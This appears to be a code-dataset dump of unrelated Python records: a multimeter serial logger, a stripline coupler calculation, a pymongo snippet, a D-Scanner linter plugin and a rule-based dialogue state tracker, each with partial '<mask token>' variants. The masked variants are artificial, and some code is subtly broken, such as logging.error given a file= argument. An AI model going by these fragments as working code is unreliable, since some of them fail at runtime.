SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText('Verbinden')\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText('Beenden')\n else:\n self.cancel()\n self.widget.pushButton.setText('Fehler')\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error('recieved incomplete data, skipping...', file=sys\n .stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.\n MESSAGE_LENGTH - 1)\n else:\n logging.error('received incorrect data (%s), skipping...' %\n test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error('received incomplete message (%s), skipping...' %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n except ValueError as e:\n logging.debug(e)\n logging.error('Error decoding: %s on message %s' % (str(e),\n data.hex()))\n return False, None, None\n return True, round(message.value * message.multiplier, 10\n ), message.base_unit\n\n\nif __name__ == '__main__':\n standalone = Plugin()\n standalone.setup()\n", "step-4": "try:\n from LoggerPlugin import LoggerPlugin\nexcept ImportError:\n from RTOC.LoggerPlugin import LoggerPlugin\nfrom .holdPeak_VC820.vc820py.vc820 import MultimeterMessage\nimport serial\nimport sys\nimport traceback\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\nimport logging as log\nlog.basicConfig(level=log.INFO)\nlogging = log.getLogger(__name__)\ndevicename = 'HoldPeak'\ndefault_device = 'COM7'\nSERIAL_BAUDRATE = 2400\nSERIAL_BYTESIZE = 8\nSERIAL_TIMEOUT = 1\nSAMPLERATE = 1\n\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText('Verbinden')\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText('Beenden')\n else:\n self.cancel()\n self.widget.pushButton.setText('Fehler')\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error('recieved incomplete data, skipping...', file=sys\n .stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.\n MESSAGE_LENGTH - 1)\n else:\n logging.error('received incorrect data (%s), skipping...' %\n test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error('received incomplete message (%s), skipping...' %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n except ValueError as e:\n logging.debug(e)\n logging.error('Error decoding: %s on message %s' % (str(e),\n data.hex()))\n return False, None, None\n return True, round(message.value * message.multiplier, 10\n ), message.base_unit\n\n\nif __name__ == '__main__':\n standalone = Plugin()\n standalone.setup()\n", "step-5": "try:\n from LoggerPlugin import LoggerPlugin\nexcept ImportError:\n from RTOC.LoggerPlugin import LoggerPlugin\n\nfrom .holdPeak_VC820.vc820py.vc820 import MultimeterMessage\nimport serial\nimport sys\nimport traceback\n\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\nimport logging as log\nlog.basicConfig(level=log.INFO)\nlogging = log.getLogger(__name__)\n\ndevicename = \"HoldPeak\"\ndefault_device = 'COM7'\nSERIAL_BAUDRATE = 2400\nSERIAL_BYTESIZE = 8\nSERIAL_TIMEOUT = 1\nSAMPLERATE = 1\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Plugin setup\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n\n self._last_value = 0\n self._jump_allowed = True\n # Data-logger thread\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n # self.updater.start()\n\n def __openPort(self, portname=default_device):\n # Communication setup\n #self.portname = \"/dev/ttyUSB0\"\n #self.portname = \"COM7\"\n self.portname = portname\n #################################################################################\n # os.system(\"sudo chmod a+rw /dev/ttyUSB0\")\n # #######\n # uncomment this line if you do not set device rules:\n # > sudo nano /etc/udev/rules.d/50-myusb.rules\n # > * SUBSYSTEMS==\"usb\", ATTRS{idVendor}==\"067b\", ATTRS{idProduct}==\"2303\", GROUP=\"users\", MODE=\"0666\"\n # > [Strg+O, Strg+X]\n # > sudo udevadm control --reload\n # Ref: http://ask.xmodulo.com/change-usb-device-permission-linux.html\n #################################################################################\n try:\n self._serial_port = serial.Serial(\n self.portname, baudrate=SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE, timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n # dtr and rts settings required for adapter\n self._serial_port.dtr = True\n self._serial_port.rts = False\n # -------------\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n # THIS IS YOUR THREAD\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == \"V\":\n datanames = [\"Spannung\"]\n elif unit == \"A\":\n datanames = [\"Strom\"]\n elif unit == \"Ohm\":\n datanames = [\"Widerstand\"]\n elif unit == \"°C\":\n datanames = [\"Temperatur\"]\n elif unit == \"F\":\n datanames = [\"Kapazität\"]\n elif unit == \"Hz\":\n datanames = [\"Frequenz\"]\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value-value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir+\"/holdPeak_VC820/portSelectWidget.ui\", self.widget)\n # self.setCallbacks()\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText(\"Verbinden\")\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText(\"Beenden\")\n else:\n self.cancel()\n self.widget.pushButton.setText(\"Fehler\")\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error(\"recieved incomplete data, skipping...\", file=sys.stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.MESSAGE_LENGTH-1)\n else:\n logging.error(\"received incorrect data (%s), skipping...\" % test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error(\"received incomplete message (%s), skipping...\" %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n #message.value = message.get_base_reading()\n except ValueError as e:\n logging.debug(e)\n logging.error(\"Error decoding: %s on message %s\" % (str(e), data.hex()))\n return False, None, None\n # logging.debug(str(message))\n # return True, message.value, message.unit\n return True, round(message.value*message.multiplier, 10), message.base_unit\n\n\nif __name__ == \"__main__\":\n standalone = Plugin()\n standalone.setup()\n", "step-ids": [ 5, 8, 10, 11, 12 ] }
[ 5, 8, 10, 11, 12 ]
import scipy.constants as const import scipy.optimize as opt import numpy as np import pum.algorithms as alg from pum.lines import * from pum.net import * mu = 1 eps = 2.56 b = 2.8 * const.milli C = 13.0 Z0 = 50 f0 = 1.34 * const.giga k = 10 ** ( - np.abs(C) / 20) print 'k = {}' .format( k) Z0e = Z0 * np.sqrt( ( 1 + k) / ( 1 - k)) Z0o = Z0 * np.sqrt( ( 1 - k) / ( 1 + k)) print '(Z0e, Z0o) = {}; {}' .format( Z0e, Z0o) modke = Z0e / ( 29.976 * const.pi * np.sqrt( mu / eps)) qe = np.exp( - const.pi * modke) ke = np.sqrt( qe) * ( ( alg.n_fun( qe) / alg.d_fun( qe)) ** 2) modko = Z0o / ( 29.976 * const.pi * np.sqrt( mu / eps)) qo = np.exp( - const.pi * modko) ko = np.sqrt( qo) * ( ( alg.n_fun( qo) / alg.d_fun( qo)) ** 2) w = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke * ko)) s = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke / ko)) - w lamb = const.c / ( np.sqrt(eps) * f0) print 'lambda = {}; lambda/4 = {}' .format( lamb, lamb / 4) print 'w = {} mm; s = {} mm' .format( w / const.milli, s / const.milli) print '(Z0e, Z0o) = {}' .format( stripline_coupled( w, s, b, 0, mu, eps))
normal
{ "blob_id": "f81e4c9a502855dca31c6c991a08a12af1c2e2a6", "index": 7745, "step-1": "import scipy.constants as const\nimport scipy.optimize as opt\nimport numpy as np\nimport pum.algorithms as alg\nfrom pum.lines import *\nfrom pum.net import *\n\nmu = 1\neps = 2.56\nb = 2.8 * const.milli \nC = 13.0\nZ0 = 50\nf0 = 1.34 * const.giga\n\nk = 10 ** ( - np.abs(C) / 20)\nprint 'k = {}' .format( k)\nZ0e = Z0 * np.sqrt( ( 1 + k) / ( 1 - k))\nZ0o = Z0 * np.sqrt( ( 1 - k) / ( 1 + k))\nprint '(Z0e, Z0o) = {}; {}' .format( Z0e, Z0o)\n\n\nmodke = Z0e / ( 29.976 * const.pi * np.sqrt( mu / eps))\nqe = np.exp( - const.pi * modke)\nke = np.sqrt( qe) * ( ( alg.n_fun( qe) / alg.d_fun( qe)) ** 2)\nmodko = Z0o / ( 29.976 * const.pi * np.sqrt( mu / eps))\nqo = np.exp( - const.pi * modko)\nko = np.sqrt( qo) * ( ( alg.n_fun( qo) / alg.d_fun( qo)) ** 2)\n\nw = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke * ko))\ns = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke / ko)) - w\n\nlamb = const.c / ( np.sqrt(eps) * f0)\nprint 'lambda = {}; lambda/4 = {}' .format( lamb, lamb / 4)\nprint 'w = {} mm; s = {} mm' .format( w / const.milli, s / const.milli)\nprint '(Z0e, Z0o) = {}' .format( stripline_coupled( w, s, b, 0, mu, eps))\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from django.test import TestCase # Create your tests here. import pymongo client = pymongo.MongoClient(host='127.0.0.1', port=27017) db = client.NBA_china_spider collection = db.data data = [title for title in collection.find()] print(data[0]['url'])
normal
{ "blob_id": "52ebe80e2d520bf07b21dc668223348002eb6d42", "index": 2790, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(data[0]['url'])\n", "step-3": "<mask token>\nclient = pymongo.MongoClient(host='127.0.0.1', port=27017)\ndb = client.NBA_china_spider\ncollection = db.data\ndata = [title for title in collection.find()]\nprint(data[0]['url'])\n", "step-4": "from django.test import TestCase\nimport pymongo\nclient = pymongo.MongoClient(host='127.0.0.1', port=27017)\ndb = client.NBA_china_spider\ncollection = db.data\ndata = [title for title in collection.find()]\nprint(data[0]['url'])\n", "step-5": "from django.test import TestCase\n\n# Create your tests here.\nimport pymongo\n\nclient = pymongo.MongoClient(host='127.0.0.1', port=27017)\ndb = client.NBA_china_spider\ncollection = db.data\n\ndata = [title for title in collection.find()]\nprint(data[0]['url'])\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from channels.routing import route from .consumers import message_consumer channel_routing = [ route("slack.rtm.message", message_consumer) ]
normal
{ "blob_id": "8439972b4458ba66d98f6a80a82a35576df472a4", "index": 8096, "step-1": "<mask token>\n", "step-2": "<mask token>\nchannel_routing = [route('slack.rtm.message', message_consumer)]\n", "step-3": "from channels.routing import route\nfrom .consumers import message_consumer\nchannel_routing = [route('slack.rtm.message', message_consumer)]\n", "step-4": "from channels.routing import route\nfrom .consumers import message_consumer\n\nchannel_routing = [\n route(\"slack.rtm.message\", message_consumer)\n]", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# # linter.py # Linter for SublimeLinter version 4. # # Written by Brian Schott (Hackerpilot) # Copyright © 2014-2019 Economic Modeling Specialists, Intl. # # License: MIT # """This module exports the D-Scanner plugin class.""" from SublimeLinter.lint import Linter, STREAM_STDOUT class Dscanner(Linter): """Provides an interface to dscanner.""" cmd = ("dscanner", "-S", "${file}") regex = r'^.+?\((?P<line>\d+):(?P<col>\d+)\)\[((?P<warning>warn)|(?P<error>error))\]: (?P<message>.+)$' multiline = False tempfile_suffix = "-" word_re = None defaults = { "selector": "source.d" } name = "D-Scanner"
normal
{ "blob_id": "fda73b5dac038f077da460d6ebfb432b756909d9", "index": 3125, "step-1": "<mask token>\n\n\nclass Dscanner(Linter):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Dscanner(Linter):\n <mask token>\n cmd = 'dscanner', '-S', '${file}'\n regex = (\n '^.+?\\\\((?P<line>\\\\d+):(?P<col>\\\\d+)\\\\)\\\\[((?P<warning>warn)|(?P<error>error))\\\\]: (?P<message>.+)$'\n )\n multiline = False\n tempfile_suffix = '-'\n word_re = None\n defaults = {'selector': 'source.d'}\n name = 'D-Scanner'\n", "step-3": "<mask token>\n\n\nclass Dscanner(Linter):\n \"\"\"Provides an interface to dscanner.\"\"\"\n cmd = 'dscanner', '-S', '${file}'\n regex = (\n '^.+?\\\\((?P<line>\\\\d+):(?P<col>\\\\d+)\\\\)\\\\[((?P<warning>warn)|(?P<error>error))\\\\]: (?P<message>.+)$'\n )\n multiline = False\n tempfile_suffix = '-'\n word_re = None\n defaults = {'selector': 'source.d'}\n name = 'D-Scanner'\n", "step-4": "<mask token>\nfrom SublimeLinter.lint import Linter, STREAM_STDOUT\n\n\nclass Dscanner(Linter):\n \"\"\"Provides an interface to dscanner.\"\"\"\n cmd = 'dscanner', '-S', '${file}'\n regex = (\n '^.+?\\\\((?P<line>\\\\d+):(?P<col>\\\\d+)\\\\)\\\\[((?P<warning>warn)|(?P<error>error))\\\\]: (?P<message>.+)$'\n )\n multiline = False\n tempfile_suffix = '-'\n word_re = None\n defaults = {'selector': 'source.d'}\n name = 'D-Scanner'\n", "step-5": "#\n# linter.py\n# Linter for SublimeLinter version 4.\n#\n# Written by Brian Schott (Hackerpilot)\n# Copyright © 2014-2019 Economic Modeling Specialists, Intl.\n#\n# License: MIT\n#\n\n\"\"\"This module exports the D-Scanner plugin class.\"\"\"\n\nfrom SublimeLinter.lint import Linter, STREAM_STDOUT\n\n\nclass Dscanner(Linter):\n\n \"\"\"Provides an interface to dscanner.\"\"\"\n\n cmd = (\"dscanner\", \"-S\", \"${file}\")\n regex = r'^.+?\\((?P<line>\\d+):(?P<col>\\d+)\\)\\[((?P<warning>warn)|(?P<error>error))\\]: (?P<message>.+)$'\n multiline = False\n tempfile_suffix = \"-\"\n word_re = None\n defaults = {\n \"selector\": \"source.d\"\n }\n name = \"D-Scanner\"\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. import copy import json import os import convlab from convlab.modules.dst.multiwoz.dst_util import init_state from convlab.modules.dst.multiwoz.dst_util import normalize_value from convlab.modules.dst.state_tracker import Tracker from convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA class RuleDST(Tracker): """Rule based DST which trivially updates new values from NLU result to states.""" def __init__(self): Tracker.__init__(self) self.state = init_state() prefix = os.path.dirname(os.path.dirname(convlab.__file__)) self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json')) def update(self, user_act=None): # print('------------------{}'.format(user_act)) if not isinstance(user_act, dict): raise Exception('Expect user_act to be <class \'dict\'> type but get {}.'.format(type(user_act))) previous_state = self.state new_belief_state = copy.deepcopy(previous_state['belief_state']) new_request_state = copy.deepcopy(previous_state['request_state']) for domain_type in user_act.keys(): domain, tpe = domain_type.lower().split('-') if domain in ['unk', 'general', 'booking']: continue if tpe == 'inform': for k, v in user_act[domain_type]: k = REF_SYS_DA[domain.capitalize()].get(k, k) if k is None: continue try: assert domain in new_belief_state except: raise Exception('Error: domain <{}> not in new belief state'.format(domain)) domain_dic = new_belief_state[domain] assert 'semi' in domain_dic assert 'book' in domain_dic if k in domain_dic['semi']: nvalue = normalize_value(self.value_dict, domain, k, v) # if nvalue != v: # _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue)) new_belief_state[domain]['semi'][k] = nvalue elif k in domain_dic['book']: new_belief_state[domain]['book'][k] = v elif k.lower() in domain_dic['book']: new_belief_state[domain]['book'][k.lower()] = v elif k == 'trainID' and domain == 'train': new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v) else: # raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain)) with open('unknown_slot.log', 'a+') as f: f.write('unknown slot name <{}> of domain <{}>\n'.format(k, domain)) elif tpe == 'request': for k, v in user_act[domain_type]: k = REF_SYS_DA[domain.capitalize()].get(k, k) if domain not in new_request_state: new_request_state[domain] = {} if k not in new_request_state[domain]: new_request_state[domain][k] = 0 new_state = copy.deepcopy(previous_state) new_state['belief_state'] = new_belief_state new_state['request_state'] = new_request_state new_state['user_action'] = user_act self.state = new_state return self.state def init_session(self): self.state = init_state()
normal
{ "blob_id": "8de82d09c8a9a1c1db59b0cac9cf8dda04f35847", "index": 3335, "step-1": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n <mask token>\n", "step-2": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n", "step-3": "<mask token>\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n", "step-4": "import copy\nimport json\nimport os\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n", "step-5": "# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT license.\n\nimport copy\nimport json\nimport os\n\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n # print('------------------{}'.format(user_act))\n if not isinstance(user_act, dict):\n raise Exception('Expect user_act to be <class \\'dict\\'> type but get {}.'.format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain 